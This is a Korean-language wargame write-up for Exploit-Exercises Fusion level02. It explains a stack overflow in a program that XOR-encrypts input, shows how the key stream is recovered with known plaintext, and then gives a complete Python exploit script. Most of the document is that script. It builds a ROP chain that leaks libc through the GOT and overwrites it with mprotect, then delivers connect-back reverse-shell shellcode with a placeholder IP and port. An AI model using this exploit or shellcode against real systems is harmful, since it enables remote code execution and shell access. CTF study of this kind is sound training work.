[exploit-exercise] fusion level02

이번 문제는 ASLR, NX-bit 보호기법이 걸려있습니다. 

전체적인 동작은 encrypt_file() 함수에서 사용자에게 사이즈와 해당 사이즈만큼의 스트링을 입력받고, 이를 cipher() 함수에서 암호화하여 다시 전달해주는 방식입니다.

bof가 일어나는 부분은 encrypt_file() 함수에 있습니다. buffer 변수는 사이즈가 고정되어 있는 반면 입력받는 크기를 결정하는 sz 변수는 사용자가 마음대로 설정할 수 있기 때문에 이 부분은 아주 쉽게 bof를 일으킬 수 있습니다.

문제는, eip가 덮힐 때의 스트링은 랜덤값과 한바이트씩 xor된 상태이기 때문에 정상적인 공격 페이로드를 입력했더라도 cipher()함수에 한 번 들어갔다 나오면 단순 스트림암호화가 되어있게 됩니다.

그렇지만, xor 같은 경우는 아래와 같은 특성을 갖기 때문에 나머지 하나를 알 수 있게됩니다.

A ^ B = C

A ^ (A ^ B) = C ^ A = B

만약, 문자 'A'(0x41)를 입력했을 때, cipher()함수를 거치고 출력 된 문자 값이 'C'(0x42)라면 keybuf[0] = 0x02 임을 알 수 있습니다. 또한, 이 keybuf는 최초에 한 번 랜덤 값을 입력받고 이후에는 같은 값으로 계속 스트림암호화를 하게 됩니다.

따라서, 아래 exploit 코드에서는 round1() 함수에서 128바이트의 keybuf를 알아내고, round2() 함수에서는 공격 페이로드를 미리 알아낸 keybuf와 xor해서 서버에 전송합니다.

이렇게 되면, cipher()에 들어간 스트링이 다시 한 번 고정된 keybuf와 xor 연산을 하므로 정상적인 공격 페이로드가 스택에 들어가게 됩니다.

from socket import * import time import struct host = "192.168.0.107" port = 20002 keybuf = {} shellcode = ("\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68" "\xaa\xbb\xcc\xdd" #ip "\x66\x68" "\x05\x39" #port "\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0" "\x66\xcd\x80\x52\xb8\x44\x44\x44\x44\x35\x2a\x6b\x37\x2c\x50\xb8\x44\x44" "\x44\x44\x35\x6b\x6b\x26\x2d\x50\x31\xc0\x31\xc9\x89\xe3" "\xb0\x0b\xcd\x80") p = lambda x: struct.pack("<L", x) up = lambda x: struct.unpack("<L", x)[0] def recv_until(s, strings): data = '' while 1: if strings in data: return data else: data += s.recv(1) def connect(): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) return s def round1(s): global keybuf print '' print "[+] Start Exploit!!" print '' print "[+] Round 1 Start" recv_until(s, "--]\n") time.sleep(0.2) print " - Sending Plaintext" s.send("E") # Selecting Encrypt s.send("\x80\x00\x00\x00") # Size : 0x20 s.send("A"*(128)) # Sending Plaintext time.sleep(2) recv_until(s, "file --]\n") time.sleep(1) size = hex(up(s.recv(4))) #print ' - size :', size print " - Recv Encrypted Data" for i in range(0, 128): encrypted_data = int(s.recv(1).encode('hex'), 16) # Recv Encrypted Data keybuf[i] = ord('A') ^ encrypted_data # Calculating keybuf #print ' ', hex(encrypted_data) print " - Getting Keybuf" #for i in range(0, 128): # print ' ', str(i)+'->'+str(hex(keybuf[i])) # Print keybuf time.sleep(2) def round2(s): global keybuf ppppr = 0x80499bc bss = 0x804b580 read_plt = 0x8048860 write_plt = 0x80489c0 open_plt = 0x8048970 open_got = 0x804b3c8 # mprotect mprotect_open = 0xdb30 # mprotect_libc - open_libc print '' print "[+] Round 2 Start" s.send("E") # Selecting Encrypt s.send("\x90\x00\x02\x00") # Size : 0x210000 payload = '' payload += "A"*0x20010 payload += p(read_plt) #eip payload += p(ppppr+1) payload += p(0) payload += p(bss) payload += p(100+len(shellcode)) payload += p(write_plt) # memory leak payload += p(ppppr+1) payload += p(1) payload += p(open_got) payload += p(4) payload += p(read_plt) # got overwrite payload += p(ppppr+1) payload += p(0) payload += p(open_got) payload += p(4) payload += p(open_plt) # mprotect payload += p(ppppr+1) payload += p(bss-0x580) payload += p(0x1000) payload += p(7) payload += p(bss) payload += "A"*(0x20090-len(payload)) new_payload = '' for i in range(0, len(payload)): new_payload += chr(ord(payload[i]) ^ keybuf[i%128]) print " - Sending Payload" s.send(new_payload) # Sending Plaintext recv_until(s, "file --]\n") time.sleep(0.1) size=hex(up(s.recv(4))) #print ' - size :', size s.recv(0x20090) time.sleep(0.2) s.send("Q") s.send("\x90"*100+shellcode) open_libc = up(s.recv(4)) print ' - open@libc :', hex(open_libc) mprotect_libc = open_libc + mprotect_open print ' - mprotect@libc :', hex(mprotect_libc) s.send(p(mprotect_libc)) s.close() def main(): print "[+] Exploit-Exercise Fusion Level02" try: s = connect() except ConnError: pass else: print "[+] Connect Server" print "host :", host, " , port :", str(port) print '' round1(s) round2(s) if __name__ == "__main__": main()